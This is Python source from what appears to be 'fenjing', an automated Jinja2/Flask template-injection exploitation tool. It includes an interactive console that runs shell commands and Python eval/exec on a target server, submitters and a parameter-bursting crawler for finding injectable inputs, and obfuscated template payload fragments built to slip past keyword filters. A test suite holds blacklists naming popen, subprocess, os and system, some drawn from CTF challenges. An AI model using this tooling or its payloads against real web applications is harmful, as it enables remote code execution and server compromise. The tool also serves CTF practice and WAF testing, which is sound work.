from typing import Callable

from pygments.lexers.shell import BashLexer

from prompt_toolkit import PromptSession, print_formatted_text, HTML
from prompt_toolkit.completion import NestedCompleter
from prompt_toolkit.lexers import PygmentsLexer
from prompt_toolkit.styles import style_from_pygments_cls
from prompt_toolkit.lexers import PygmentsLexer
from pygments.styles import get_style_by_name


# completer = WordCompleter(["@eval", "@get-config", "@help", "@ls", "@cat"])
completer = NestedCompleter.from_nested_dict(
    {
        "@eval": None,
        "@exec": None,
        "@get-config": None,
        "@ls": None,
        "@cat": None,
        "@help": {"eval", "get-config", "ls", "cat", "exec"},
    }
)
style = style_from_pygments_cls(get_style_by_name("inkpot"))

INTERACTIVE_MODE_HELP_LONG = """\
<orange><b>Interactive Console</b></orange>:
- type to execute shell command with os.popen()
- <blue>@eval</blue>: eval python expression on the target server
- <blue>@exec</blue>: exec one line of python statement on the server
- <blue>@get-config</blue>: get the config of the target server
- <blue>@help</blue>: show help, use @help subcommand to show subcommand help
- Press <blue>Ctrl+D</blue> to exit
<orange><b>交互终端</b></orange>：
- 输入任意命令即可在目标上用os.popen()执行
- <blue>@eval</blue>: 调用eval函数执行任意python表达式
- <blue>@exec</blue>: 调用exec函数执行任意python语句，仅支持一行
- <blue>@get-config</blue>: 获得目标的flask config
- <blue>@help</blue>: 获得帮助，使用@help subcommand查看子命令的帮助
- 按下<blue>Ctrl+D</blue>退出
Tab completion is available/有tab补全
<orange><b>Example/示例</b></orange>:
$>> ls /
$>> @eval 1+2+3+100000
$>> @exec print('Hello, World')
$>> @help
$>> @get-config
$>> @help eval\
"""

INTERACTIVE_MODE_HELP_SHORT = """\
<orange><b>Example/示例</b></orange>:
$>> ls /
$>> @eval 1+2+3+100000
$>> @get-config
Type @help for full help/输入@help获得完整帮助\
"""

HELPS = {
    "eval": "Eval any python expression, example: @eval 1+1+4+5+1+4",
    "exec": "Exec any python statement, which return nothing. example: @exec if 1 < 2: print('1 < 2!')",
    "get-config": "Get the config of the target, example: @get-config",
    "ls": "list the directory with python builtin os.listdir()",
    "cat": "read a file with python",
}


def interact(cmd_exec_func: Callable):
    print_formatted_text(HTML(INTERACTIVE_MODE_HELP_SHORT))
    # print(INTERACTIVE_MODE_HELP)
    session = PromptSession(
        lexer=PygmentsLexer(BashLexer),
        completer=completer,
        style=style,
        include_default_pygments_style=False,
    )
    while True:
        try:
            text = session.prompt("$>> ")
        except KeyboardInterrupt:
            print("Use Ctrl+D to exit!")
            continue
        except EOFError:
            break
        if text.strip() == "":
            continue
        if text.strip().lower()[:5] == "@help":
            text = text.strip().lower()
            if len(text) == 5:
                print_formatted_text(HTML(INTERACTIVE_MODE_HELP_LONG))
            else:
                subcommand = text[6:]
                help_text = HELPS.get(subcommand, None)
                if help_text:
                    print(help_text)
                else:
                    print(f"subcommand {repr(subcommand)} not found")
            continue
        result = cmd_exec_func(text)
        print(result)

    print("Bye!")



"""给字符串加上ANSI转义符以在命令行中打印出颜色

"""

import platform

IS_SUPPORTED_PLATFORM = platform.system() != "Windows"
IS_COLORING_ENABLED = False


def set_enable_coloring(enable=True):
    """打开或关闭默认关闭的字符串上色

    Args:
        enable (bool, optional): 设置是否开启. Defaults to True.
    """
    global IS_COLORING_ENABLED  # pylint: disable=W0603
    IS_COLORING_ENABLED = enable


def colored(color, text, bold=False):
    """使用ANSI转义字符对文本上色，在windows下不会上色

    Args:
        color (str): 使用的颜色
        text (str): 要上色的字符串
        bold (bool, optional): 是否加粗. Defaults to False.

    Returns:
        str: 上色后的字符串
    """
    if not IS_SUPPORTED_PLATFORM or not IS_COLORING_ENABLED:
        return text
    colors = {
        "red": "31",
        "green": "32",
        "yellow": "33",
        "blue": "34",
        "purple": "35",
        "cyan": "36",
    }
    format_str = "\033[{};{}m{}\033[0m"
    if bold:
        format_str = "\033[1;{};{}m{}\033[0m"
    if color not in colors:
        color = "blue"
    return format_str.format(int(bold), colors[color], text)



# pylint: skip-file
# flake8: noqa

import sys

sys.path.append("..")
from fenjing.form import get_form
from fenjing.requester import HTTPRequester
import unittest
import fenjing
from typing import Union
from fenjing.const import TemplateEnvironment, ReplacedKeywordStrategy
from fenjing.cracker import Cracker
from fenjing.options import Options
from fenjing.submitter import FormSubmitter, PathSubmitter, Submitter, HTTPResponse
from fenjing import const, waf_func_gen
import logging
import os

VULUNSERVER_ADDR = os.environ.get("VULUNSERVER_ADDR", "http://127.0.0.1:5000")
SLEEP_INTERVAL = float(os.environ.get("SLEEP_INTERVAL", 0.01))

class WrappedSubmitter(Submitter):
    def __init__(self, subm, blacklist):
        super().__init__()
        self.subm = subm
        self.blacklist = blacklist

    def submit_raw(self, raw_payload):
        if any(w in raw_payload for w in self.blacklist):
            return HTTPResponse(status_code=200, text="Nope")
        return self.subm.submit(raw_payload)


class TestBase(unittest.TestCase):
    def setup_local_waf(self, blacklist):
        self.local_blacklist = blacklist
        self.subm = WrappedSubmitter(
            FormSubmitter(
                url=VULUNSERVER_ADDR,
                form=get_form(action="/", inputs=["name"], method="GET"),
                target_field="name",
                requester=HTTPRequester(interval=SLEEP_INTERVAL),
            ),
            self.local_blacklist,
        )

    def setup_remote_waf(self, remote_uri):
        self.local_blacklist = None
        self.subm = FormSubmitter(
            url=VULUNSERVER_ADDR,
            form=get_form(action=remote_uri, inputs=["name"], method="GET"),
            target_field="name",
            requester=HTTPRequester(interval=SLEEP_INTERVAL),
        )

    def setUp(self):
        super().setUp()
        self.cracker_other_opts = {}
        self.setup_local_waf(["."])

    def test_waf(self):
        cracker = Cracker(self.subm, **self.cracker_other_opts)
        full_payload_gen = cracker.crack()
        assert full_payload_gen is not None, self.__class__.__name__
        payload, will_print = full_payload_gen.generate(
            const.OS_POPEN_READ,
            "echo 'cracked! @m WR171NG[]{}|;&&&\" S()METHING RANDON' " + self.__class__.__name__,
        )
        assert (
            payload is not None
        ), self.__class__.__name__  # 因为type hint无法认出.assertIsNotNone
        self.assertTrue(will_print)
        if self.local_blacklist:
            for w in self.local_blacklist:
                self.assertNotIn(w, payload)
        resp = self.subm.submit(payload)
        assert resp is not None
        self.assertIn('cracked! @m WR171NG[]{}|;&&&" S()METHING RANDON', resp.text, resp.text)


class TestEasy(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                '"',
                "'",
                "_",
                ".",
                "+",
                "~",
                "{{",
            ]
        )


class TestStringOct(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "lipsum",
                "x",
                "u",
                "''",
                '""',
                "+",
                "~",
                "%",
                "globals",
                "class",
                "mro",
                "base",
                ":",
                "lower",
            ]
        )


class TestStringHex(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "lipsum",
                "\\1",
                "u",
                "''",
                '""',
                "+",
                "~",
                "%",
                "globals",
                "class",
                "mro",
                "base",
                ":",
                "lower",
            ]
        )


class TestStringUnicodeHex(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "lipsum",
                "\\1",
                "x",
                "''",
                '""',
                "+",
                "~",
                "%",
                "globals",
                "class",
                "mro",
                "base",
                ":",
                "lower",
            ]
        )


class TestStringLower1(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "lipsum",
                "\\1",
                "u",
                "x",
                "''",
                '""',
                "+",
                "~",
                "%",
                "globals",
                "class",
                "mro",
                "base",
                ":",
                ".",
            ]
        )


class TestIntegerAdd(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "\\1",
                "'",
                '"',
                "~",
                ".",
                "[",
                "dict",
                "0",
                "1",
                "2",
                "3",
                "4",
                "5",
                "6",
                "7",
                "8",
                "9",
                "-",
                "*",
            ]
        )


class TestIntegerSub(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "\\1",
                "'",
                '"',
                "~",
                ".",
                "[",
                "dict",
                "0",
                "1",
                "2",
                "3",
                "4",
                "5",
                "6",
                "7",
                "8",
                "9",
                "+",
            ]
        )


class TestPath(TestBase):
    def setUp(self):
        super().setUp()
        self.local_blacklist = None
        self.subm = PathSubmitter(
            url=VULUNSERVER_ADDR + "/crackpath/",
            requester=HTTPRequester(interval=SLEEP_INTERVAL),
        )


class TestHard1(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "'",
                '"',
                ".",
                "_",
                "import",
                "request",
                "url",
                "\\x",
                "os",
                "system",
                "\\u",
            ]
        )


class TestHard2(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "_",
                "'",
                '"',
                ".",
                "system",
                "os",
                "eval",
                "exec",
                "popen",
                "subprocess",
                "posix",
                "builtins",
                "namespace",
                "open",
                "read",
                "\\",
                "self",
                "mro",
                "base",
                "global",
                "init",
                "/",
                "00",
                "chr",
                "value",
                "get",
                "url",
                "pop",
                "import",
                "include",
                "request",
                "{{",
                "}}",
                '"',
                "config",
                "=",
            ]
        )


class TestHard3(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                '0"',
                ".",
                '"',
                "system",
                "eval",
                "exec",
                "popen",
                "subprocess",
                "posix",
                "builtins",
                "namespace",
                "read",
                "self",
                "mro",
                "base",
                "global",
                "init",
                "chr",
                "value",
                "pop",
                "import",
                "include",
                "request",
                "{{",
                "}}",
                "config",
                "=",
                "lipsum",
                "~",
                "url_for",
            ]
        )


class TestHard4(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "config",
                "self",
                "g",
                "os",
                "class",
                "length",
                "mro",
                "base",
                "lipsum",
                "os",
                "import",
                "x",
                "globals",
                "cycler",
                "[",
                '"',
                "'",
                "_",
                ".",
                "+",
                "~",
                "{{",
            ]
        )


class TestHard5(TestBase):
    # geekgame2023 klf_2
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "_",
                "\\",
                "'",
                '"',
                "request",
                "+",
                "class",
                "init",
                "arg",
                "config",
                "app",
                "self",
                "cd",
                "chr",
                "request",
                "url",
                "builtins",
                "globals",
                "base",
                "pop",
                "import",
                "popen",
                "getitem",
                "subclasses",
                "/",
                "flashed",
                "os",
                "open",
                "read",
                "count",
                "*",
                "38",
                "124",
                "47",
                "59",
                "99",
                "100",
                "cat",
                "~",
                ":",
                "not",
                "0",
                "-",
                "ord",
                "37",
                "94",
                "96",
                "[",
                "]",
                "index",
                "length",
            ]
        )


class TestHard6(TestBase):
    # geekgame2023 klf_2 enhanced
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "_",
                "\\",
                "'",
                '"',
                "request",
                "+",
                "class",
                "init",
                "arg",
                "config",
                "app",
                "self",
                "cd",
                "chr",
                "request",
                "url",
                "builtins",
                "globals",
                "base",
                "pop",
                "import",
                "popen",
                "getitem",
                "subclasses",
                "/",
                "flashed",
                "os",
                "open",
                "read",
                "count",
                "*",
                "38",
                "124",
                "47",
                "59",
                "99",
                "100",
                "cat",
                "~",
                ":",
                "not",
                "0",
                "-",
                "ord",
                "37",
                "94",
                "96",
                "[",
                "]",
                "index",
                "length",
                "join",
            ]
        )


class TestHard7(TestBase):
    # geekgame2023 klf_3 enhanced
    def setUp(self):
        super().setUp()
        self.setup_local_waf(
            [
                "_",
                "\\",
                "'",
                '"',
                "[",
                "]",
                "~",
                "+",
                "@",
                "^",
                "#",
                "/",
                ":",
                "*",
                "-",
                "request",
                "class",
                "init",
                "arg",
                "config",
                "app",
                "self",
                "cd",
                "chr",
                "request",
                "url",
                "builtins",
                "globals",
                "base",
                "pop",
                "import",
                "popen",
                "getitem",
                "subclasses",
                "flashed",
                "os",
                "open",
                "read",
                "cat",
                "count",
                "not",
                "length",
                "index",
                "ord",
                "43",
                "45",
                "38",
                "124",
                "47",
                "59",
                "99",
                "100",
                "0",
                "37",
                "94",
                "96",
                "48",
                "49",
                "50",
                "51",
                "52",
                "53",
                "54",
                "55",
                "56",
                "57",
                "58",
                "59",
                "))",
            ]
        )


class TestStaticWAF(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_remote_waf("/static_waf")


class TestStaticWAF2(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_remote_waf("/static_waf2")


class TestDynamicWAF(TestBase):
    def setUp(self):
        super().setUp()
        self.blacklist = None
        self.setup_remote_waf("/dynamic_waf")


class TestWeirdWAF(TestBase):
    def setUp(self):
        super().setUp()
        self.blacklist = None
        self.setup_remote_waf("/weird_waf")


class TestReversedWAF(TestBase):
    def setUp(self):
        super().setUp()
        self.blacklist = None
        self.setup_remote_waf("/reversed_waf")
        self.subm.add_tamperer(lambda x: x[::-1])


class TestLengthLimit1WAF(TestBase):
    def setUp(self):
        super().setUp()
        self.blacklist = None
        self.setup_remote_waf("/lengthlimit1_waf")

    def test_waf(self):
        cracker = Cracker(self.subm, **self.cracker_other_opts)
        full_payload_gen = cracker.crack()
        assert full_payload_gen is not None, self.__class__.__name__
        payload, will_print = full_payload_gen.generate(
            const.OS_POPEN_READ,
            "echo 'cracked!!!' " + self.__class__.__name__,
        )
        assert (
            payload is not None
        ), self.__class__.__name__  # 因为type hint无法认出.assertIsNotNone
        self.assertTrue(will_print)
        if self.local_blacklist:
            for w in self.local_blacklist:
                self.assertNotIn(w, payload)
        resp = self.subm.submit(payload)
        assert resp is not None
        self.assertIn('cracked!!!', resp.text, resp.text)

class TestLengthLimit2WAF(TestBase):
    def setUp(self):
        super().setUp()
        self.blacklist = None
        self.setup_remote_waf("/lengthlimit2_waf")

    def test_waf(self):
        cracker = Cracker(self.subm, options=Options(environment=TemplateEnvironment.FLASK))
        result = cracker.crack_eval_args()
        assert result is not None
        subm, will_print = result
        payload = "'fenjing'+'test'"
        self.assertTrue(will_print)
        resp = subm.submit(payload)
        assert resp is not None
        self.assertIn("fenjingtest", resp.text)


class TestReplacedWAFAvoid(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_remote_waf("/replace_waf")
        self.cracker_other_opts = {"options": Options(replaced_keyword_strategy=ReplacedKeywordStrategy.AVOID)}

class TestReplacedWAFAvoid2(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_remote_waf("/replace_waf2")
        self.cracker_other_opts = {"options": Options(replaced_keyword_strategy=ReplacedKeywordStrategy.AVOID)}


class TestReplacedWAFDoubleTapping(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_remote_waf("/replace_waf")
        self.cracker_other_opts = {"options": Options(replaced_keyword_strategy=ReplacedKeywordStrategy.DOUBLETAPPING)}


class TestJinjaEnv(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_remote_waf("/jinja_env_waf")
        self.cracker_other_opts = {"options": Options(environment=TemplateEnvironment.JINJA2)}


class TestFix500(TestBase):
    def setUp(self):
        super().setUp()
        self.setup_remote_waf("/jinja_env_waf")
        self.cracker_other_opts = {"options": Options(environment=TemplateEnvironment.FLASK)}



"""向某个表格或者路径发出payload的submitter
"""

import logging
import subprocess
import html
import re

from typing import List, Callable, Union, NamedTuple, Dict
from urllib.parse import quote

from .form import Form, fill_form
from .requester import HTTPRequester, TCPRequester
from .colorize import colored
from .const import CALLBACK_SUBMIT

logger = logging.getLogger("submitter")


Tamperer = Callable[[str], str]


def shell_tamperer(shell_cmd: str) -> Tamperer:
    """返回一个新的shell tamperer

    Args:
        shell_cmd (str): 用于修改payload的命令

    Returns:
        Tamperer: 新的Tamperer
    """

    def tamperer(payload: str):
        proc = subprocess.Popen(
            shell_cmd,
            shell=True,
            stdout=subprocess.PIPE,
            stdin=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )
        assert proc.stdin and proc.stdout
        proc.stdin.write(payload.encode())
        proc.stdin.close()
        ret = proc.wait()
        if ret != 0:
            raise ValueError(
                f"Shell command return non-zero code {ret} for input {payload}"
            )
        out = proc.stdout.read().decode()
        if out.endswith("\n"):
            logger.warning(
                "Tamperer %s output %s ends with '\\n', it may cause some issues.",
                shell_cmd,
                out,
            )
        return out

    return tamperer

def update_content_length(request: bytes) -> bytes:
    """更新请求体长度

    Args:
        request (bytes): 请求

    Returns:
        bytes: 更新结果
    """
    if request.startswith(b"GET") or request.startswith(b"HEAD"):
        return request
    header, _, body = request.rpartition(b"\r\n\r\n")
    if len(header) == 0:
        return request
    content_length = len(body)
    content_length_header = f"Content-Length: {content_length}".encode()
    result, replace_count = re.subn(b"Content-Length:.*", content_length_header, header, 0, re.IGNORECASE)
    if replace_count == 0:
        result += b"\r\n" + content_length_header
    return result + b"\r\n\r\n" + body

class HTTPResponse(NamedTuple):
    """解析后的HTTP响应

    Args:
        status_code: 返回值
        text: HTTP的正文
    """

    status_code: int
    text: str


class BaseSubmitter:
    """
    payload提交器，其会发送对应的payload，并获得相应页面的状态码与正文
    其支持增加tamperer, 在发送之前对payload进行编码
    """

    def __init__(self, callback=None):
        self.tamperers: List[Tamperer] = []
        self.callback: Callable[[str, Dict], None] = (
            callback if callback else (lambda x, y: None)
        )

    def add_tamperer(self, tamperer: Tamperer):
        """增加新的tamperer

        Args:
            tamperer (Tamperer): 新的tamperer
        """
        self.tamperers.append(tamperer)

    def submit_raw(self, raw_payload: str) -> Union[HTTPResponse, None]:
        """提交tamperer修改后的payload

        Args:
            raw_payload (str): payload

        Returns:
            Union[HTTPResponse, None]: payload提交结果
        """
        raise NotImplementedError()

    def submit(self, payload: str) -> Union[HTTPResponse, None]:
        """调用tamperer修改payload并提交

        Args:
            raw_payload (str): payload

        Returns:
            Union[HTTPResponse, None]: payload提交结果
        """
        if self.tamperers:
            logger.debug("Applying tampers...")
            for tamperer in self.tamperers:
                payload = tamperer(payload)
        logger.debug("Submit %s", colored("blue", payload))
        resp = self.submit_raw(payload)
        if resp is None:
            return None
        return HTTPResponse(resp.status_code, html.unescape(resp.text))


class TCPSubmitter(BaseSubmitter):
    """根据模板从TCP发送HTTP1.1请求的类"""
    def __init__(
        self,
        requester: TCPRequester,
        pattern: bytes,
        toreplace=b"PAYLOAD",
        urlencode_payload=True,
        tamperers: Union[List[Tamperer], None] = None,
        enable_update_content_length=True,
    ):

        super().__init__()
        self.pattern = pattern
        self.toreplace = toreplace
        self.urlencode_payload = urlencode_payload
        self.req = requester
        self.enable_update_content_length = enable_update_content_length
        if tamperers:
            for tamperer in tamperers:
                self.add_tamperer(tamperer)

    def submit_raw(self, raw_payload):
        if self.urlencode_payload:
            raw_payload = quote(raw_payload)
        request = self.pattern.replace(self.toreplace, raw_payload.encode())
        if self.enable_update_content_length:
            request = update_content_length(request)
        result = self.req.request(request)
        if result is None:
            return None
        code, text = result
        return HTTPResponse(code, text)


class RequestSubmitter(BaseSubmitter):
    """向一个url提交GET或POST数据"""

    def __init__(
        self,
        url: str,
        method: str,
        target_field: str,
        params: Union[Dict[str, str], None],
        data: Union[Dict[str, str], None],
        requester: HTTPRequester,
        tamperers: Union[List[Tamperer], None] = None,
    ):
        """传入目标的URL, method和提交的项

        Args:
            url (str): 目标URL
            method (str): 方法
            target_field (str): 目标项
            params (Union[Dict[str, str], None]): 目标GET参数
            data (Union[Dict[str, str], None]): 目标POST参数
        """
        super().__init__()
        self.url = url
        self.method = method
        self.target_field = target_field
        self.params = params if params else {}
        self.data = data if data else {}
        self.req = requester
        if tamperers:
            for tamperer in tamperers:
                self.add_tamperer(tamperer)

    def submit_raw(self, raw_payload):
        params, data = self.params.copy(), self.data.copy()
        if self.method == "POST":
            data.update({self.target_field: raw_payload})
        else:
            params.update({self.target_field: raw_payload})
        logger.info(
            "Submit %s",
            colored("blue", f"{self.url} {self.method} params={params} data={data}"),
        )
        return self.req.request(
            method=self.method, url=self.url, params=params, data=data
        )


class FormSubmitter(BaseSubmitter):
    """
    向一个表格的某一项提交payload, 其他项随机填充
    """

    def __init__(
        self,
        url: str,
        form: Form,
        target_field: str,
        requester: HTTPRequester,
        callback: Union[Callable[[str, Dict], None], None] = None,
        tamperers: Union[List[Tamperer], None] = None,
    ):
        """传入目标表格的url，form实例与目标表单项，以及用于提交HTTP请求的requester

        Args:
            url (str): 表格所在的url
            form (Form): 表格的实例
            target_field (str): 目标表单项
            requester (Requester): Requester实例，用于实际发送HTTP请求
        """
        super().__init__(callback)
        self.url = url
        self.form = form
        self.req = requester
        self.target_field = target_field
        if tamperers:
            for tamperer in tamperers:
                self.add_tamperer(tamperer)

    def submit_raw(self, raw_payload: str) -> Union[HTTPResponse, None]:
        inputs = {self.target_field: raw_payload}
        resp = self.req.request(**fill_form(self.url, self.form, inputs))
        self.callback(
            CALLBACK_SUBMIT,
            {
                "type": "form",
                "form": self.form,
                "inputs": inputs,
                "response": resp,
            },
        )
        if resp is None:
            return None
        return HTTPResponse(resp.status_code, resp.text)


class PathSubmitter(BaseSubmitter):
    """将payload进行url编码后拼接在某个url的后面并提交，看见..和/时拒绝提交"""

    def __init__(
        self,
        url: str,
        requester: HTTPRequester,
        callback: Union[Callable[[str, Dict], None], None] = None,
        tamperers: Union[List[Tamperer], None] = None,
    ):
        """传入目标URL和发送请求的Requester

        Args:
            url (str): 目标URL
            requester (Requester): Requester实例
        """
        super().__init__(callback)
        if not url.endswith("/"):
            logger.warning(
                "PathSubmitter get a url that's not ends with '/', appending it."
            )
            url += "/"
        self.url = url
        self.req = requester
        if tamperers:
            for tamperer in tamperers:
                self.add_tamperer(tamperer)

    def submit_raw(self, raw_payload: str) -> Union[HTTPResponse, None]:
        if any(w in raw_payload for w in ["/", ".."]):
            logger.info(
                "Don't submit %s because it can't be in the path.",
                colored("yellow", repr(raw_payload)),
            )
            return None
        resp = self.req.request(method="GET", url=self.url + quote(raw_payload))
        self.callback(
            CALLBACK_SUBMIT,
            {
                "type": "path",
                "url": self.url,
                "payload": raw_payload,
                "response": resp,
            },
        )
        if resp is None:
            return None
        return HTTPResponse(resp.status_code, resp.text)


Submitter = BaseSubmitter



"""扫描指定的网站并返回所有表格

"""

import logging
import re
import random
import string

from urllib.parse import urlparse
from typing import Union, Generator, Tuple, List, Set

from bs4 import BeautifulSoup

from .form import get_form, parse_forms, Form
from .requester import HTTPRequester
from .colorize import colored
from .wordlist import HTTP_PARAMS_LIST

logger = logging.getLogger("scan_url")
PARAM_CHUNK_SIZE = 150
PARAM_MAXIMUM_COUNT = 5


def parse_urls(html: Union[str, BeautifulSoup]) -> list:
    """从html中解析出所有的链接

    Args:
        html (str|BeautifulSoup): HTML

    Returns:
        List[str]: 所有链接
    """
    if isinstance(html, str):
        bs_obj = BeautifulSoup(html, "html.parser")
    elif isinstance(html, BeautifulSoup):
        bs_obj = html

    return [
        element.attrs["href"] for element in bs_obj.select("a") if "href" in element
    ]


def burst_respond_params_data(
    requester: HTTPRequester, url: str, html_str: str
) -> Tuple[List[str], List[str]]:
    """根据初始HTML文本爆破对应的URL是否有对应的参数

    Args:
        requester (Requester): Requester
        url (str): 目标url
        html_str (str): 目标的HTML文本

    Returns:
        Tuple[List[str], List[str]]: 产生回显的GET参数和POST参数
    """
    words: List[str] = (
        re.findall(r"\w{1,30}", html_str)
        + re.findall(r"[a-zA-Z0-9_-]{1,30}", html_str)
        + HTTP_PARAMS_LIST
    )
    words = list(set(words))
    random.shuffle(words)
    if len(words) > PARAM_CHUNK_SIZE * 100:
        logger.warning("found %d params, don't burst", len(words))
        return [], []
    logger.warning("Bursting %d params...", len(words))
    respond_get_params: Set[str] = set()
    respond_post_params: Set[str] = set()

    for i in range(0, len(words), PARAM_CHUNK_SIZE):
        words_chunk = words[i : i + PARAM_CHUNK_SIZE]
        for _ in range(3):
            params = {
                k: "".join(random.choices(string.ascii_lowercase + string.digits, k=6))
                for k in words_chunk
            }
            data = {
                k: "".join(random.choices(string.ascii_lowercase + string.digits, k=6))
                for k in words_chunk
            }
            resp = requester.request(method="GET", url=url, params=params)
            if resp:
                respond_get_params |= set(
                    k for k, v in params.items() if v in resp.text
                )
            resp = requester.request(method="POST", url=url, data=data)
            if resp:
                respond_post_params |= set(k for k, v in data.items() if v in resp.text)
                break

    return list(respond_get_params), list(respond_post_params)


def yield_form(
    requester: HTTPRequester, start_url: str
) -> Generator[Tuple[str, List[Form]], None, None]:
    """根据起始URL扫描出所有的表格

    Args:
        requester (Requester): HTTP工具类Requester
        start_url (str): 起始URL

    Yields:
        Generator[Tuple[str, List[Form]], None, None]:
            所有URL与其中的表格
    """
    found = False
    targets = [
        start_url,
    ]
    visited = set()
    logger.warning("Start scanning")
    while targets:
        target_url = targets.pop(0)
        if target_url in visited:
            continue
        visited.add(target_url)

        resp = requester.request(method="GET", url=target_url)
        if resp is None:
            logger.warning("Fetch URL %s failed!", target_url)
            continue

        html = BeautifulSoup(resp.text, "html.parser")
        forms = parse_forms(target_url, html)

        if forms:
            yield target_url, forms
            found = True

        respond_get_params, respond_post_params = burst_respond_params_data(
            requester, target_url, resp.text
        )
        if respond_get_params and len(respond_get_params) < PARAM_MAXIMUM_COUNT:
            logger.warning(
                "Found get params with burst: %s",
                colored("blue", repr(respond_get_params)),
            )
            yield target_url, [
                get_form(
                    action=urlparse(target_url).path,
                    inputs=respond_get_params,
                    method="GET",
                )
            ]
            found = True
        if respond_post_params and len(respond_post_params) < PARAM_MAXIMUM_COUNT:
            logger.warning(
                "Found post params with burst: %s",
                colored("blue", repr(respond_post_params)),
            )
            yield target_url, [
                get_form(
                    action=urlparse(target_url).path,
                    inputs=respond_post_params,
                    method="POST",
                )
            ]
            found = True

        targets += parse_urls(html)
    if not found:
        logger.warning("Found nothing.")



"""与HTML表格相关的函数

"""

import sys
import random
import logging
import string
from typing import Dict, List, Union, Iterable
from urllib.parse import urlparse, urlunparse

from bs4 import BeautifulSoup

if sys.version_info >= (3, 8):
    from typing import Literal
else:
    from typing_extensions import Literal

logger = logging.getLogger("utils.form")
Form = Dict[
    Literal["action", "inputs", "method"],
    Union[str, set],
]


def get_form(action: str, inputs: Iterable, method: str = "POST") -> Form:
    """根据输入生成一个表单

    Args:
        action (str): action
        inputs (Iterable): 所有input
        method (str, optional): 提交方法. Defaults to "POST".

    Returns:
        Form: 表单
    """
    method = method.upper()
    if not action.startswith("/"):
        action = "/" + action
    assert method in ["GET", "POST"]
    return {"action": action, "method": method, "inputs": set(inputs)}


def parse_forms(url, html: Union[str, BeautifulSoup]) -> List[Form]:
    """从html中解析出对应的表单

    Args:
        url (str): HTML对应的URL
        html (Union[str, BeautifulSoup]): HTML

    Returns:
        List[Form]: 所有表单
    """
    parsed_url = urlparse(url)
    uri = parsed_url.path

    if isinstance(html, str):
        bs_doc = BeautifulSoup(html, "html.parser")
    elif isinstance(html, BeautifulSoup):
        bs_doc = html

    details = []
    for form_element in bs_doc.select("form"):
        form = get_form(
            action=form_element.attrs.get("action", uri),
            method=form_element.attrs.get("method", "POST").upper(),
            inputs=[
                element.attrs["name"]
                for element in form_element.select("input")
                if "name" in element.attrs
            ],
        )
        details.append(form)
    return details


def random_fill(form: Form) -> Dict[str, str]:
    """随机填充表格

    Args:
        form (Form): 表格

    Returns:
        Dict[str, str]: 随机填充的结果，键为表格项，值为表格项的值
    """
    return {
        k: "".join(random.choices(string.ascii_lowercase, k=8)) for k in form["inputs"]
    }


def fill_form(url, form, form_inputs=None, randomly_fill_other=True):
    """根据输入填充表单，返回给requests库的参数

    Args:
        url (str): 表单所在的URL
        form (dict): 表单
        form_inputs (dict, optional): input以及对应的值. Defaults to None.
        randomly_fill_other (bool, optional): 是否随机填充其他input. Defaults to True.

    Returns:
        dict: 给requests的参数
    """
    if randomly_fill_other:
        fill = random_fill(form)
        if form_inputs is not None:
            fill.update(form_inputs)
    else:
        fill = form_inputs
    return {
        "url": urlunparse(urlparse(url)._replace(path=form["action"])),
        "method": form["method"],
        ("data" if form["method"] == "POST" else "params"): fill,
    }



"""提供上下文的payload, 为最终的payload提供一系列变量

"""

from typing import Iterable, Dict, Any, Callable, Union
import logging
import random
import string
import re
from .const import WafFunc, PythonEnvironment, SET_STMT_PATTERNS
from .options import Options

logger = logging.getLogger("context_vars")

# 所有的上下文payload, 存储格式为: {payload: {变量名：变量值}}

Context = Dict[str, Any]
ContextPayloads = Dict[str, Context]
Waf = Callable[[str], bool]

# 所有上下文的payload, 变量名不能重复
# 注意这里的payload需要兼容python2/3

context_payloads_stmts: ContextPayloads = {
    "{%set oa={}|int%}{%set la=oa**oa%}{%set lla=(la~la)|int%}"
    + "{%set llla=(lla~la)|int%}{%set lllla=(llla~la)|int%}": {
        "oa": 0,
        "la": 1,
        "lla": 11,
        "llla": 111,
        "lllla": 1111,
    },
    "{%set ob={}|int%}{%set lb=ob**ob%}{%set llb=(lb~lb)|int%}"
    + "{%set lllb=(llb~lb)|int%}{%set llllb=(lllb~lb)|int%}"
    + "{%set bb=llb-lb-lb-lb-lb-lb%}{%set sbb=lllb-llb-llb-llb-llb-llb%}"
    + "{%set ssbb=llllb-lllb-lllb-lllb-lllb-lllb%}"
    + "{%set zzeb=llllb-lllb-lllb-lllb-lllb-lllb-lllb-lllb-lllb%}": {
        "ob": 0,
        "lb": 1,
        "llb": 11,
        "lllb": 111,
        "llllb": 1111,
        "bb": 6,
        "sbb": 56,
        "ssbb": 556,
        "zzeb": 223,
    },
}

context_payloads_stmts_py3 = {
    (
        "{%set ndr={}|select()|trim|list|batch(25)|first|last%}{%set sls=1|attr"
        + "((ndr,ndr,dict(truediv=x)|join,ndr,ndr)|join)|attr"
        + "((ndr,ndr,dict(doc=x)|join,ndr,ndr)|join)|batch(12)|first|last%}"
    ): {
        "ndr": "_",
        "sls": "/",
    },
}

context_payloads_exprs = {
    "lipsum()|urlencode|first": "%",
    "lipsum|escape|batch(22)|first|last": "_",
    "dict(x=x)|length": 1,
    "dict(x=x)|count": 1,
    "dict(a=x,b=x,c=x)|length": 3,
    "dict(a=x,b=x,c=x)|count": 3,
    "dict(aaaaa=x)|first|length": 5,
    "dict(aaaaa=x)|first|count": 5,
